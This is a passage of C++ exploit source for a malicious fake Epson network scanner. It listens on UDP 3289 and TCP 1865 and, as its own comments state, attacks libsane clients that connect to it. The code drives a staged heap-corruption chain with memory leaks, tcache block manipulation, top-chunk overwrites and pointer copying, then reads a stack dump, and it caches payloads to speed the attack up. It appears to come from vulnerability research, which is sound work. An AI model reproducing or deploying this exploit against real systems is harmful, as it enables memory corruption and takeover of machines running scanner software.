      if (acceptCount_ == A_copy_pointer && buf_size_ >= 0x1000) {
        // Only the first 13 + 0x100 bytes of the large payload are
        // requested; H_wait_stackdump skips the 13 and parses the rest.
        printf("wait for stack dump\n");
        state_ = H_wait_stackdump;
        return 0x100 + 13;
      }
      state_ = H_wait_payload;
      return buf_size_;

    case H_wait_moreinfo: {
      // This case is triggered if we specified a non-zero "more" value in
      // the initial reply.

      // Parse the header. (First 12 bytes.)
      if (!header_ok()) {
        printf("EPSON message has malformed header.\n");
        return -1;
      }

      cmd_ = (((uint16_t)buf[2]) << 8) | buf[3];
      // The size field of the plain header is only logged; the values that
      // we keep come from the extended header that follows it.
      const uint32_t hdr_size = read_be32(6);
      printf("more INFO: %x %x\n", cmd_, hdr_size);
      buf_size_ = read_be32(12);
      reply_len_ = read_be32(16);
      printf("more INFO extra: %x %x\n", buf_size_, reply_len_);

      // Send the follow-up reply that was selected by eds_send when it put
      // us into this state.
      switch (moreinfo_state_) {
      case M_leakmem:
        send_leakmem(sock);
        break;
      case M_create_tcache_blocks:
        send_create_tcache_blocks(sock);
        break;
      case M_reindex_tcache_blocks:
        send_reindex_tcache_blocks(sock);
        break;
      case M_overwrite_tcache_blocks:
        send_overwrite_tcache_blocks(sock);
        break;
      case M_create_extra_tcache_block:
        send_create_extra_tcache_block(sock);
        break;
      case M_reindex_extra_tcache_block:
        send_reindex_extra_tcache_block(sock);
        break;
      case M_resize_extra_tcache_block:
        send_resize_extra_tcache_block(sock);
        break;
      case M_large_mmap:
        send_mmap(sock);
        break;
      case M_create_barrier:
        send_create_barrier(sock);
        break;
      case M_resize_buffer:
        send_resize_buffer(sock);
        break;
      case M_overwrite_top:
        send_overwrite_top(sock);
        break;
      case M_subtract_top:
        send_subtract_top(sock);
        break;
      case M_copy_pointer:
        send_copy_pointer(sock);
        break;
      case M_leakmem64:
        send_leakmem64(sock);
        break;
      case M_leakmem64_nrdBUSY:
        send_leakmem64_nrdBUSY(sock);
        break;
      default:
        printf("Invalid EPSON moreinfo header state: %d\n", moreinfo_state_);
        return -1;
      }
      state_ = H_wait_hdr;
      return 12;
    }

    case H_wait_payload:
      // Dispatch on the command that was parsed from the header.
      switch (cmd_) {
      case 0x2000: // eds_send
        return eds_send(sock, buf);
      case 0x2100: // net_lock
        return net_lock(sock, buf);
      default:
        printf("Unknown EPSON command: 0x%x\n", cmd_);
        return -1;
      }

    case H_wait_stackdump:
      // fingers crossed!
      // Skip the first 13 bytes; the dump data starts after them.
      read_stackdump(sock, buf + 13);
      return 0;

    default:
      printf("Invalid EPSON header state: %d\n", state_);
      return -1;
    }
  }

  // No-op: this handler does no work when the connection is closed.
  void disconnect() override {}
};

// Factory for the handler that serves a newly accepted TCP connection.
//
// The handler that gets built depends on how many connections we have
// already accepted from the same client, as counted by the shared
// EpsonClientSet.
class BuildEpsonHandlerTCP : public BuildRecvHandlerTCP {
  // Per-client connection counters (owned elsewhere).
  EpsonClientSet& epsonClientSet_;

  // One cache slot for every stage that comes before A_copy_pointer.
  TCP_Cache cache_[EpsonHandlerTCP::A_copy_pointer];

public:
  explicit BuildEpsonHandlerTCP(EpsonClientSet& epsonClientSet) :
    epsonClientSet_(epsonClientSet)
  {}

  // Build the handler for a connection from `peer_addr`. The caller
  // receives a pointer to a newly allocated handler.
  RecvHandlerTCP* build(
    sockaddr* peer_addr, socklen_t peer_addr_len
  ) override {
    const size_t stage =
      epsonClientSet_.incrClient(peer_addr, peer_addr_len);

    // The final stage depends on data that we receive from the client,
    // so it is never cached and always gets a live handler.
    if (stage >= EpsonHandlerTCP::A_copy_pointer) {
      return new EpsonHandlerTCP(stage);
    }

    // Every other stage sends exactly the same bytes each time it runs.
    // The first run of a stage records its payload in the cache, and
    // later runs are served from the cache. The conversation between
    // libsane and the fake scanner consists of many very short messages
    // going back and forth, with a small delay on each one. Sending the
    // cached messages as a single batch means that libsane doesn't have
    // to wait for the next message to arrive, which makes the exploit
    // run approximately 3x faster.
    TCP_Cache& slot = cache_[stage];
    if (!slot.isInitialized()) {
      return new TCP_Cache_Record(new EpsonHandlerTCP(stage), slot);
    }
    return new TCP_Cache_Playback(slot);
  }
};

// Entry point: register a UDP handler on port 3289 and a TCP listener on
// port 1865 with a single epoll instance, then run the event loop.
//
// Exits with EXIT_FAILURE if the epoll instance cannot be created or if
// either handler cannot be registered.
int main() {
  const int epollfd = epoll_create1(0);
  if (epollfd == -1) {
    fprintf(stderr, "Call to epoll_create1 failed.\n");
    exit(EXIT_FAILURE);
  }

  // Per-client connection counters, handed to both the UDP handler and
  // the TCP handler factory.
  EpsonClientSet epsonClientSet;

  if (EpollRecvHandlerUDP::build(
        epollfd,
        create_and_bind_udp(3289),
        new EpsonHandlerUDP(epsonClientSet)) < 0) {
    fprintf(stderr, "Failed to bind UDP port 3289.\n");
    exit(EXIT_FAILURE);
  }

  if (EpollTcpConnectHandler::build(
        epollfd,
        create_bind_and_listen_tcp(1865),
        new BuildEpsonHandlerTCP(epsonClientSet)) < 0) {
    // This is the TCP listener, so report it as such.
    fprintf(stderr, "Failed to bind TCP port 1865.\n");
    exit(EXIT_FAILURE);
  }

  epoll_main_loop(epollfd);

  return 0;
}
